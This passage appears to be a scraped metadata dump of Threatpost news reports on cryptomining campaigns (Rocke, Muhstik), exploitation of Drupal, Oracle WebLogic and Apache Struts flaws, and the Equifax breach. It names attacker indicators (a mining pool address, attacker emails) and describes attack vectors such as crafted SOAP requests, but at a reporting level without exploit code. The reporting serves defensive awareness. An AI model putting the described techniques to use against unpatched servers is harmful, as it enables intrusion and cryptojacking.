The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable Format (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for the open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. 
Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and is marketed to malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt,\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. 
Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. 
At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal [attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits the Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6, 7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigation, Netlab researchers said they believe at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. 
We name it Muhstik, for this keyword keeps popping up in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses the popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\nIn addition, Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201d said Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module. 
This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. 
I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. 
Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. 
Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given its similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution, and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. 
In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. These are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. 
\u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. 
website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in an open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. 
The analyst who penned the report, however, failed to specify which vulnerability and neglected to state how he arrived at that conclusion.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache Struts, allowed an attacker to make a maliciously crafted request to a webserver running Struts. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. 
Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and, as he has argued recent IoT issues [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. 
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. 
Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 
12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. 
Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>) fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition, which received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. 
Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. 
It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. 
The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. 
There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all 
versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have 
developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. The process can be abused for malicious intent and has been used in a host of attack scenarios including denial-of-service, access-control bypass and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object.
